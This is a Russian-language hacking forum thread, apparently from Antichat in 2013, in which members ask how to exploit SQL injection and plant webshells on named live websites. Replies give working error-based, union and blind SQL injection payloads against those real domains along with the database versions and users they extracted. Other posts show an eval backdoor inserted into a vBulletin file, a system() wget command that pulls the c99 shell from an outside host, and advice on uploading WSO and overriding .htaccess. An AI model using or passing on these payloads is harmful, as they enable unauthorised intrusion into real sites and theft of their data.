wget site?id=etc/linux.img -O linux.img

zloy_fantom
10.02.2013, 19:51
wget site?id=etc/linux.img -O linux.img


Спасибо, получилось, только образ все равно не собирается почему-то (собирал, используя R-studio)

narviss
12.02.2013, 15:52
http://www.personalguide.ru/news/page32


Возможно ли раскрутить?

Konqi
12.02.2013, 16:21
Возможно ли раскрутить?


допустим можно.

что дальше?

BigBear
12.02.2013, 17:52
Возможно ли раскрутить?


Можно. Например так

_ttp://www.personalguide.ru/news/page33_'and(select*from(select+name_const(version( ),1),name_const(version(),1))a)='1/

Duplicate column name '5.3.7-MariaDB-mariadb116~squeeze-log'

Yan.Total
13.02.2013, 17:59
https://site.com/cgi-bin/fnc/drop_flag.pl?id=91&l=&s=&shop_id=%5c




DBD::mysql::db do failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '91'' at line...


Нашел с помощью сканера. Может, кто подскажет как раскрутить? Не могу понять, куда писать запросы.

Как понял, знак %5c - это /

BigBear
13.02.2013, 19:28
Нашел с помощью сканера. Может, кто подскажет как раскрутить? Не могу понять, куда писать запросы.
Как понял, знак %5c - это /


Сайт покажи =/

cipa21
16.02.2013, 00:36
подскажите, можно что-то сделать с

http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'

er9j6@
16.02.2013, 00:42
подскажите, можно что-то сделать с
http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'


Это можно сделать

_http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/count(*)/**/from/**/information_schema.tables/**/limit/**/0,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/'

FunOfGun
16.02.2013, 01:19
Здравствуйте, подскажите как можно раскрутить такие скули:

http://www.timesworld24.com/cat-news-details.php?id=%20'+union(sElect+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17)+--+ //без валидного id отдает ошибку sql

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74 // несколько запросов, один из низ update. как раскрутить? order by, как я понял, отпадает

http://www.daviddeltredici.com/worksbycat.php%3Fid=-6+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17+--+ //404 отдает, не mysql?

Заарнее благодарен

durito
16.02.2013, 10:08
Здравствуйте, подскажите как можно раскрутить такие скули:
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74 // несколько запросов, один из низ update. как раскрутить? order by, как я понял, отпадает
Заарнее благодарен



http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74%27+or%201%20group%20by%20concat%28user%28 %29,floor%28rand%280%29*2%29%29%20having%20min%280 %29%20or%201+--+

Duplicate entry 'asanbiotech_e@localhost1' for key 1

BigBear
16.02.2013, 10:10
Заарнее благодарен


http://www.timesworld24.com/cat-news-details.php?id=1

Инъекция в числовом параметре

Определим количество столбцов (смотрим низ страницы)

http://www.timesworld24.com/cat-news-details.php?id=1+group+by+7+--+#.UR8NhG-rEhH TRUE

http://www.timesworld24.com/cat-news-details.php?id=1+group+by+8+--+#.UR8NhG-rEhH FALSE

Обходим WAF

http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,2,3,4,5,6,7)+--+

Добиваемся вывода

http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,concat_ws(0x3a,ver sion(),user()),3,4,5,6,7)+--+#.UR8NQW-rEhH

5.5.23-55:timeswor_n2031t2@localhost

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1='1

Инъекция в строковом параметре

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+25+--+ TRUE

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+26+--+ FALSE

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,'25#+--+

Данные передаются в UPDATE запрос, а значит финт ушами не прокатит.

Остаётся BLIND

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=if(substring((@@version),1,1)=4,1, 2)+--+

Ну или более привычный вам

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+substring((@@version),1,1)=4+--+

Есть возможность крутить как Error-Based, но её уже предложили выше.

http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27

Инъекция в числовом параметре

Добиваемся вывода

http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27+and+1=2+union+select+1,unhex(hex(@@version)) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

0xd098d0b3d0
16.02.2013, 18:09
Вобщем суть такая. Есть форма активации одной софтинки. Софтинка при установке привязывается к железу. В форму вводишь ключ который получился от привязки (по типу 45F7EF0456A88B0536633746C986 )

И ключ оплаты который получил на сайте, после оплаты.

Вот собственно форма Активации: _http://worldbik.ru/act.php

В ней два поля. Ковычки и т.п. Фильтруется, однако если в верхнее поле (код оплаты) ввести русские буквы ( в нижнее поле нужно ввести что угодно, чтобы не было пустым.) то вылазит ошибка Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/muwik/worldbik.ru/act.php on line 76

Можно ли как нибудь этим воспользоваться, или кроме раскрытия путей это ничего не даст?

antielvis
17.02.2013, 16:17
Подскажите, можно отсюда что-нибудь вытащить? Или в каком направлении двигаться?

http://site.ru/index.php?area=viewSale&id=31

class: PostgresDatabaseException

code: 42P01

message: ERROR: 42P01: relation "sale" does not exist - SELECT "sale"."id", "sale"."category_id", "sale"."title", "sale"."created", "sale"."announce", "sale"."content", "sale"."project_id" FROM "sale" WHERE ("sale"."id" = '31')

#0 /var/www/onphp-framework/core/DB/DB.class.php(321): PgSQL->queryRaw('SELECT "sale"."...')

#1 /var/www/onphp-framework/core/DB/PgSQL.class.php(126): DB->query(Object(SelectQuery))

#2 /var/www/onphp-framework/main/DAOs/Workers/BaseDaoWorker.class.php(152): PgSQL->queryRow(Object(SelectQuery))

#3 /var/www/onphp-framework/main/DAOs/Workers/CommonDaoWorker.class.php(53): BaseDaoWorker->cachedFetchObject(Object(SelectQuery), 604800, true)

#4 /var/www/onphp-framework/main/DAOs/Workers/TransparentDaoWorker.class.php(29): CommonDaoWorker->getById(31, 604800)

#5 /var/www/onphp-framework/main/DAOs/GenericDAO.class.php(165): TransparentDaoWorker->getById(31, 3600)

#6 /var/www/onphp-framework/core/Form/Primitives/PrimitiveIdentifier.class.php(144): GenericDAO->getById(31)

#7 /var/www/onphp-framework/core/Form/Primitives/PrimitiveIdentifier.class.php(118): PrimitiveIdentifier->actualImportValue(31)

#8 /var/www/onphp-framework/core/Form/Form.class.php(422): PrimitiveIdentifier->import(Array)

#9 /var/www/onphp-framework/core/Form/Form.class.php(299): Form->importPrimitive(Array, Object(PrimitiveIntegerIdentifier))

#10 /var/www/site.ru/friends/newAwards-msk/user/controllers/viewNews.class.php(22): Form->import(Array)

#11 /var/www/site.ru/library/classes/Flow/PosterSessionFilter.class.php(66): viewNews->handleRequest(Object(HttpRequest))

#12 /var/www/site.ru/friends/newAwards-msk/classes/Flow/ProjectFilter.class.php(29): PosterSessionFilter->handleRequest(Object(HttpRequest))

#13 /var/www/site.ru/friends/newAwards-msk/user/htdocs/index.php(56): ProjectFilter->handleRequest(Object(HttpRequest))

#14 {main}

при запросе

?area=viewSale&id=31'+or+"sale"."id" = '31 или

?area=viewSale&id=31'+or+id = '31 отправляет на главную страницу

BigBear
17.02.2013, 16:41
Судя по всему - это PostgreSQL.

А значит и инъектировать надо с особенностями этого SQL языка.

Always
18.02.2013, 01:42
http://bilet.aero/news/event?id=4'

плиз...

cat1vo
18.02.2013, 02:22
http://bilet.aero/news/event?id=4'
плиз...




http://bilet.aero/news/event?id=4)or(1)group+by(mid(version(),rand(0)|0)) having(avg(0))and(1)--+-

Duplicate entry '5.0.51a-24+lenny2'

dynda2000
18.02.2013, 20:51
Здравствуйте подскажите можно ли тут что нибудь сделать? http://80.80.220.18/phpinfo.php

BigBear
19.02.2013, 17:33
Здравствуйте подскажите можно ли тут что нибудь сделать? http://80.80.220.18/phpinfo.php


Да, посмотреть вывод команды phpinfo()

Fldr
22.02.2013, 11:01
Трям.

Как можно с помощью js скрипта подгрузить шелл ?

тобишь я могу в корень сайта влепить код типа:

пхп коды не обрабатываются

Boombilka
22.02.2013, 11:20
Всем привет, пытаюсь залится на vb 4.1.2. Добавил в faq_complete

if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));

Phpinfo(); выводится.

Пробую вот так:


faq.php?e=eval(file_get_contents('http://pastebin.com/raw.php?i=S7hg2xCy'));


И ничего. Что я не так делаю?

Boombilka
22.02.2013, 13:37
Возник другой вопрос.


system("wget -O customavatars/sss.php http://c99.gen.tr/c99.txt");

Делаю вот так, папка кастом аватарс доступна под запись. Сайт бесконечно грузит этот запрос. Отображаю файлы из каталога:


system("cd customavatars;ls -al");

Файл создается, но создается он странно:


-rw-r--r-- 1 apache apache 0 Feb 22 12:06 sss.php

и при попытке чтения вылетает Internal Server Error

Опять таки, что я делаю не так?

BigBear
22.02.2013, 14:42
Всем привет, пытаюсь залится на vb 4.1.2. Добавил в faq_complete
if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));
Phpinfo(); выводится.
Пробую вот так:

faq.php?e=eval(file_get_contents('http://pastebin.com/raw.php?i=S7hg2xCy'));

И ничего. Что я не так делаю?


Правильно будет faq.php?e=eval(file_get_contents('http://www.tut_shell_code.txt));

При этом у шелла надо убрать вначале


Файл создается, но создается он странно:
Код:
-rw-r--r-- 1 apache apache 0 Feb 22 12:06 sss.php
и при попытке чтения вылетает Internal Server Error
Опять таки, что я делаю не так?


Очевидно, что отсутсвуют права на выполнение скрипта. Ещё может быть защита посредством .htaccess

Boombilka
22.02.2013, 14:45
Правильно будет faq.php?e=eval(file_get_contents('http://www.tut_shell_code.txt));
При этом у шелла надо убрать вначале
Очевидно, что отсутсвуют права на выполнение скрипта. Ещё может быть защита посредством .htaccess


Я убирал , лил на другой хост(где прямой линк был, с .txt), но была опять бесконечная загрузка. Скорее и вправду, .htaccess мешает(он есть в корне форума), мб подскажешь, как можно обойти эту фигню?

Fldr
22.02.2013, 14:57
Я убирал , лил на другой хост(где прямой линк был, с .txt), но была опять бесконечная загрузка. Скорее и вправду, .htaccess мешает(он есть в корне форума), мб подскажешь, как можно обойти эту фигню?


просто загрузи пустой .htaccess

Boombilka
22.02.2013, 15:03
просто загрузи пустой .htaccess


через что? У меня же нету прав на загрузку, разве нет?

Fldr
22.02.2013, 15:06
Файл создается, но создается он странно:


если файл создается , так прав на папке хватает

Boombilka
22.02.2013, 15:16
если файл создается , так прав на папке хватает


да это понятно, но файл то нулевого размера. И .htaccess не могу заменить

BigBear
22.02.2013, 18:13
да это понятно, но файл то нулевого размера. И .htaccess не могу заменить


Ну отправь линк в ПМ. Помучаем вместе.

lessmore
23.02.2013, 04:23
Существует ли способ обойти trim() при использовании блайнда?

И, вместе с тем, возможно ли использовать


where id='$_GET['id']' and xxx=....

без применения комментариев?

exstreme
23.02.2013, 23:13
Помогите разобраться с Blind SQL


POST /fight_forum/search.php?sd=-1%20or%2091%3d89&search_id=unanswered&sid=50defd8e5ccb6ed213919316b7e044a4&sk=t&sr=topics&st=0 HTTP/1.1
Content-Length: 62
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: site.com
Cookie: cookie
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

sd=a&sk=a&sort=%d0%9f%d0%b5%d1%80%d0%b5%d0%b9%d1%82%d0%b8&st=0

BigBear
23.02.2013, 23:25
Помогите разобраться с Blind SQL

/fight_forum/search.php?sd=-1%20or%2091%3d89&search_id=unanswered&sid=50defd8e5ccb6ed213919316b7e044a4&sk=t&sr=topics&st=0 HTTP/1.1




Тут нет инъекта.

Над тобой девелоперы Акунетикса поглумились, а ты и не заметил...

exstreme
23.02.2013, 23:57
Тут нет инъекта.
Над тобой девелоперы Акунетикса поглумились, а ты и не заметил...


Жаль, а можно прояснить, на чем основано ложное срабатывание?

cat1vo
24.02.2013, 00:35
Тем, что Акунетикс своими запросами в 10+ потоков, нагрузил сайт и тот момент когда у него шла проверка на SQL иньекции, сайт чуток призадумался и выдал либо не тот контент (ошибку, например) или долго отвечал, и Акунетикс, любит это понимать, как рабочий вектор и сразу выдает Blind SQL Injection!

exstreme
24.02.2013, 01:40
Тем, что Акунетикс своими запросами в 10+ потоков, нагрузил сайт и тот момент когда у него шла проверка на SQL иньекции, сайт чуток призадумался и выдал либо не тот контент (ошибку, например) или долго отвечал, и Акунетикс, любит это понимать, как рабочий вектор и сразу выдает
Blind SQL Injection
!


Видно так и есть, сделал ретест, опровергло результат. Всем спасибо за помощь.

Xvir
27.02.2013, 10:23
Друзья помогите нашел инекцию как ее реализовать инъексция в пост запросе

DbException: Query failed:

SELECT `users`.`id`, IF(name != "", name, login) AS `title`, `users`.`city_id`, `users`.`group_id`, `users`.`email`, `users`.`login`, `users`.`password`, `users`.`name`, `users`.`salt`, `users`.`key`, IF(`users_groups`.`god`, "god", IF(`users`.`group_id`=4, "tl", "hr")) AS `access`,`users_groups`.`id` AS `users_groups:id`,`users_groups`.`title` AS `users_groups:title`,`users_groups`.`god` AS `users_groups:god`,`users_groups`.`custom` AS `users_groups:custom`

FROM `skb_users` AS `users`

LEFT JOIN `skb_users_groups` AS `users_groups` ON ((`users`.`group_id` = `users_groups`.`id`) AND (`users_groups`.`_state` = 0))

WHERE `users`.`_state` = 0 AND (`users`.`login` = '\'\"\\\'\\\");|]*`users`.`%0d%0a' AND {realm` = 'cms')

LIMIT 1

в '"\'\");|]*{%0d%0a могу вставить что угодно

сам запрос такой

Content-Disposition: form-data; name="_login"

'"\'\");|]*{%0d%0a

Content-Disposition: form-data; name="_password"

sdsd

что сделать дальше?

winstrool
27.02.2013, 21:51
Друзья помогите нашел инекцию как ее реализовать инъексция в пост запросе
DbException: Query failed:
SELECT `users`.`id`, IF(name != "", name, login) AS `title`, `users`.`city_id`, `users`.`group_id`, `users`.`email`, `users`.`login`, `users`.`password`, `users`.`name`, `users`.`salt`, `users`.`key`, IF(`users_groups`.`god`, "god", IF(`users`.`group_id`=4, "tl", "hr")) AS `access`,`users_groups`.`id` AS `users_groups:id`,`users_groups`.`title` AS `users_groups:title`,`users_groups`.`god` AS `users_groups:god`,`users_groups`.`custom` AS `users_groups:custom`
FROM `skb_users` AS `users`
LEFT JOIN `skb_users_groups` AS `users_groups` ON ((`users`.`group_id` = `users_groups`.`id`) AND (`users_groups`.`_state` = 0))
WHERE `users`.`_state` = 0 AND (`users`.`login` = '\'\"\\\'\\\");|]*`users`.`%0d%0a' AND {realm` = 'cms')
LIMIT 1
в '"\'\");|]*{%0d%0a могу вставить что угодно
сам запрос такой
Content-Disposition: form-data; name="_login"
'"\'\");|]*{%0d%0a
Content-Disposition: form-data; name="_password"
sdsd
что сделать дальше?


Может ссыль дашь? а там дальше посмотрим, что можно сделать

Xvir
28.02.2013, 10:07
Может ссыль дашь? а там дальше посмотрим, что можно сделать


Блин извени не могу очень важный для меня объект)а так не подскажешь?

попугай
28.02.2013, 13:19
Если скобки в URL фильтруются при проведении sql-инъекции, то бессмысленно далее пытаться что-то делать?

OxoTnik
28.02.2013, 15:01
Если скобки в URL фильтруются при проведении sql-инъекции, то бессмысленно далее пытаться что-то делать?


Кодировать запрос? http://urlencode.ru/

TeslaNik
28.02.2013, 16:25
Подскажите, возможно ли найти уязвимость на сайте с URL вот такого вида http://site.ru/catalog/catalog ... и т.д. где нет например идентификации типа id?=

BigBear
28.02.2013, 16:31
Подскажите, возможно ли найти уязвимость на сайте с URL вот такого вида http://site.ru/catalog/catalog ... и т.д. где нет например идентификации типа id?=


POST|COOKIE|HEADER никто не отменял ведь...

Так что думаю, вполне реально.

TeslaNik
28.02.2013, 16:35
POST|COOKIE|HEADER никто не отменял ведь...
Так что думаю, вполне реально.


Спасибо буду зубрить=)

blesse
28.02.2013, 22:23
Возможно сформировать запрос так чтоб скрипт выдал


query = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";

?

Скрипт pastebin (http://pastebin.com/0W9YU5H0)

zloy_fantom
01.03.2013, 19:07
Прошу помощи:

На сайте есть скрипт usr.php

следующего содержания:


get ('usr_'.$id);
if (!$ret)
{
$SQL = sqli::get ();
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` = $id");
$ret = $x->fetch_assoc ();
$memcache->set ('usr_'.$id, $ret, 0, 300);
}
return $ret;
}

?>

Насколько я понял, скрипт реализует функцию извлечения инфы из базы данных по идентификатору пользователя, но как ему сообщить этот идентификатор?

Моих познаний хватило только на следующее:

site.com/usr.php?id=1

Хотя и понимаю, что это неверно, подскажите, пожалуйста правильный запрос.

Спасибо

BigBear
01.03.2013, 19:22
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` = $id");

Вот сам запрос...

А вот переменная, которая попадает в запрос...

Она передаётся в функцию напрямую...

function get_Usr ($id)

А уж как и откуда она берётся до функции - куча и куча вариантов...

zloy_fantom
02.03.2013, 12:35
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` =
$id
");
Вот сам запрос...


Спасибо, это я понял,


А вот переменная, которая попадает в запрос...
Она передаётся в функцию напрямую...
function get_Usr ($id)


Это тоже.


А уж как и откуда она берётся до функции - куча и куча вариантов...


А вот тут непонятно: Приведенный код - это весь файл ПХП, лежащий в корне сервера, как я понял, переменная в функцию передается напрямую при запросе пхп-скрипта.

Так вот я и не понял, с каким синтаксисом составить запрос, чтобы переменная из него передалась в функцию.

Я только начинаю, поэтому со скрипом въезжаю в некоторые вопросы.

Спасибо

panfilov1991
02.03.2013, 13:45
Просканировал сайт программой Acunetix Web Vulnerability Scanner 8

Нашел 24 уязвимости.

Проблема в том, что он дает описание и содержимое этих уязвимостей, НО не дает прямую ссылку на неё.

Показывать сайт не буду из-за религиозных соображений.

Кто реально готов помочь, могу скинуть сохраненный файл от сканированного сайта.

------------

вот одна из них:


SQL injection (verified)
This vulnerability affects
/servers
.
Discovered by: Scripting (Sql_Injection.script).
Attack details
Cookie input
pass
was set to
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(7 3),CHAR(55),CHAR(87),CHAR(111),CHAR(67),CHAR(71),C HAR(99)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"
Injected pattern found:
4Cu2I7WoCGc
------------
Request
GET /servers HTTP/1.1
Cookie: login=demodemo; pass=%22and%28select 1 from%28select count%28%2A%29%2Cconcat%28%28select concat%28CHAR%2852%29%2CCHAR%2867%29%2CCHAR%28117% 29%2CCHAR%2850%29%2CCHAR%2873%29%2CCHAR%2855%29%2C CHAR%2887%29%2CCHAR%28111%29%2CCHAR%2867%29%2CCHAR %2871%29%2CCHAR%2899%29%29 from information_schema.tables limit 0%2C1%29%2Cfloor%28rand%280%29%2A2%29%29x from information_schema.tables group by x%29a%29and%22
Host: game.сайт.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
--------------
http://cs421621.vk.me/v421621376/4a06/i_0wBDU7Nkc.jpg

Melfis
02.03.2013, 14:42
panfilov1991, ссылка у тя http://твой_сайт.***/server

а скуль в куках. Лог то смотри

kacergei
02.03.2013, 17:34
погуглил так ничего и ненашел чем можно автоматизировать работу с Expression Language Injection, есть какой нибудь софт? а лучше несколько)

zloy_fantom
02.03.2013, 17:51
Продолжаю "раскручивать" сайт с помощью directory traversal (пока только этот метод мне более-менее понятен).

Нашел следующий скрипт sql.php:




Т.е. знаю имя базы данных, имя юзера и пароль. sql_ip мне не поможет, поскольку он внутренний. Как можно подключиться к базе данных, используя эти данные?

Спасибо

WendM
02.03.2013, 17:52
zloy_fantom, только если есть шел на уязвимой машине

Улыбайся
02.03.2013, 17:59
Кто может подсказать по xss. Напишите пожалуйста в личку.

panfilov1991
02.03.2013, 20:04
panfilov1991
, ссылка у тя http://твой_сайт.***/server
а скуль в куках. Лог то смотри


В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!

cat1vo
02.03.2013, 21:02
panfilov1991

В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?

zloy_fantom

Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!

OxoTnik
02.03.2013, 21:03
В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!


Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта

экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.

panfilov1991
02.03.2013, 21:07
panfilov1991
В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?
zloy_fantom
Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!




помогите


Пожалуйста

cat1vo
02.03.2013, 21:08
Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта
экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.


Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.

Все отлично работает, запрос переделал, мне так удобнее...


Host: game.parlahost.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version() ,schema())),rand(0)|0))having(avg(0))or"

Duplicate entry '5.5.29-1-log:s10parl' for key 'group_key'

Версия - 5.5.29-1-log

Названия Базы Данных - s10parl

"or(1)group+by(mid((СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС),rand(0)|0))having(avg(0))or"

Дальше делайте сами, если не знаете как, на форуме есть мануал - ССЫЛКА (https://antichat.live/threads/43966/)

З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)!

zloy_fantom
03.03.2013, 13:10
zloy_fantom
, только если есть шел на уязвимой машине


А если такой вариант:

На той-же машине, что и сервер, развернут сервер openvpn, ко внутренней сети которого я подключился как клиент. На паре машин этой сети открыты порты snmp, mysql и ssh. snmp видна просто как расшаренные папки, но в них ничего интересного. По ssh подключение доступно через putty, знать-бы пароль root... А вот есть-ли способы подключиться к mysql тем-же макаром? Какой софт нужен для этого?

Спасибо


zloy_fantom
Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!


Зарегистрировался, а вот как посмотреть, какие данные для доступа к БД они предоставляют, не понял. Зайти под теми данными попробую (дождусь только, когда админ разлогинится), только что мне это даст? Я ведь все равно не смогу шелл загрузить...Или смогу? Короче, надо пробовать, может будет доступна панель управления или редактирования....

Спасибо

winstrool
03.03.2013, 13:18
А вот есть-ли способы подключиться к mysql тем-же макаром? Какой софт нужен для этого?


Подойдет WSO, заливаешь его на сервак где хостится сайт жертвы и пробуешь подключиться, если подключится, то там уже можешь попробовать выдернуть логин:пасс жертвы, если повезет то дальше продолжаешь уже через админку жертвы...

zloy_fantom
03.03.2013, 15:46
Подойдет WSO, заливаешь его на сервак где хостится сайт жертвы и пробуешь подключиться, если подключится, то там уже можешь попробовать выдернуть логин:пасс жертвы, если повезет то дальше продолжаешь уже через админку жертвы...


Не получается: wso положил в расшаренную папку внутренней сети, но каков путь к ней в подсистеме сервера, я не знаю, т.е., через интерпретатор PHP wso не достать

Unknown
03.03.2013, 21:09
Срочно! Нужна помощь с заливкой шелла!

Есть сайт с LFI но у меня очень мало опыта с данным типом уязвимостей, потому и прошу помощи у вас, более продвинутых в этой теме. Что и как нужно делать, читал, смотрел видео но что-то никак не получается(((

Кто может почь, пишите сюда или в ЛС.

Или хотяб дайте подробнейший мануал и/или видео по заливки шелла через LFI.

winstrool
03.03.2013, 23:12
Срочно! Нужна помощь с заливкой шелла!
Есть сайт с LFI но у меня очень мало опыта с данным типом уязвимостей, потому и прошу помощи у вас, более продвинутых в этой теме. Что и как нужно делать, читал, смотрел видео но что-то никак не получается(((
Кто может почь, пишите сюда или в ЛС.
Или хотяб дайте подробнейший мануал и/или видео по заливки шелла через LFI.


Ну когда же вы научитесь самостоятельно искать инфу?! ладно...

заходим в раздел

Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости

Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд и внимательно изучаете в ней нужные вам аспекты!

а точнее ткну пальцем!

статьи по PHP инклудам:

php injection (https://antichat.live/threads/12123/)

Автор GreenBear

TRUE PHP-injection (https://antichat.live/threads/23501/)

Автор Zadoxlik

PHP-include и способы защиты (https://antichat.live/threads/91807/)

Автор _Pantera_

[новый способ] замена нулл-байту в инклудах (https://antichat.live/threads/98525/)

Автор [Raz0r]

Логи и конфиги:

Default *log, *conf files locations (https://antichat.live/threads/49775/)

respect ettee

FuckGoogle
03.03.2013, 23:19
phpinfo

здрасте

уменя естъ phpinfo() от крупного сайта...

только спомощю phpinfo() я смогу етот сайт ломатъ?

и как?

можте кто нибудъ нопомч мне?

winstrool
03.03.2013, 23:27
здрасте
уменя естъ phpinfo() от крупного сайта...
только спомощю phpinfo() я смогу етот сайт ломатъ?
и как?
можте кто нибудъ нопомч мне?


Нет не сможите!, phpinfo() выводи инфу о настройках апача и мелкой тароблы не болие того!

blesse
04.03.2013, 09:40
Возможно сформировать запрос так чтоб скрипт выдал


query = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";

?


require_once('../../../wp-config.php');

require_once('../../../wp-includes/functions.php');



// CSRF attack protection. Check the Referal field to be the same

// domain of the script



$k_id=strip_tags($wpdb->escape($_GET['id']));

$k_action=strip_tags($wpdb->escape($_GET['action']));

$k_path=strip_tags($wpdb->escape($_GET['path']));

$k_imgIndex=strip_tags($wpdb->escape($_GET['imgIndex']));



// prevent SQL injection

if (!is_numeric($k_id)) die('error|Query error' );



$table_name=$wpdb->prefix.'comment_rating';

$comment_table_name=$wpdb->prefix.'comments';



if($k_id&&$k_action&&$k_path) {

//Check to see if the comment id exists and grab the rating

$query="SELECT * FROM `$table_name` WHERE ck_comment_ id =$k_id";

$result=mysql_query($query);



if(!$result) { die('error|mysql: '.mysql_error()); }



if(mysql_num_rows($result))

{

$duplicated=0;// used as a counter to off set duplicated votes

if($row= @mysql_fetch_assoc($result))

{

// Handle proxy with original IP address

$ip=getenv("HTTP_X_FORWARDED_FOR") ?getenv("HTTP_X_FORWARDED_FOR") :getenv("REMOTE_ADDR");

if(strstr($row['ck_ips'],$ip)) {

// die('error|You have already voted on this item!');

// Just don't count duplicated votes

$duplicated=1;

$ck_ips=$row['ck_ips'];

}

else {

$ck_ips=$row['ck_ips'] .','.$ip;// IPs are separated by ','

}

}



$total=$row['ck_rating_up'] -$row['ck_rating_down'];

if($k_action=='add') {

$rating=$row['ck_rating_up'] +1-$duplicated;

$direction='up';

$total=$total+1-$duplicated;

}

elseif($k_action=='subtract')

{

$rating=$row['ck_rating_down'] +1-$duplicated;

$direction='down';

$total=$total-1+$duplicated;

} else {

die('error|Try again lat er');//No action given.

}



if (!$duplicated)

{

$query="UPDATE `$table_name` SET ck_rating_$direction= '$rating', ck_ips = '".$ck_ips."' WHERE ck_comment_id =$k_id";

$result=mysql_query($query);

if(!$result)

{

// die('error|query '.$query);

die('error|Query error');

}



// Now duplicated votes will not

if(!mysql_affected_rows())

{

die('error|affected '.$ra ting);

}



$karma_modified=0;

if (get_option('ckrating_karma_ type') =='likes'&&$k_action=='add') {

$karma_modified=1;$karma=$rating;

}

if (get_option('ckrating_karma_ type') =='dislikes'&&$k_action=='subtract') {

$karma_modified=1;$karma=$rating;

}

if (get_option('ckrating_karma_ type') =='both') {

$karma_modified=1;$karma=$total;

}



if ($karma_modified) {

$query="UPDATE `$comment_table_name` SET comment_karma = '$karma' WHERE comment_ID =$k_id";

$result=mysql_query($query);

if(!$result) die('error|C omment Query error');

}



// Invalidate the W3 cache by triggering the global wordpress action hook for an edited comment

do_action("edit_comment",$k_id);

}

} else {

die('error|Comment doesnt exist' );//Comment id not found in db, something wrong ?

}

} else {

die('error|Fatal: html format error');

}



// Add the + sign,

if ($total>0) {$total="+$total"; }



//This sends the data back to the js to pro cess and show on the page

// The dummy field will separate out any pot ential garbage that

// WP-superCache may attached to the end of the return.

echo("done|$k_id|$rating|$k_path|$direction|$total|$k_im gIndex|dummy");

?>

Unknown
04.03.2013, 15:05
И снова всем привет!

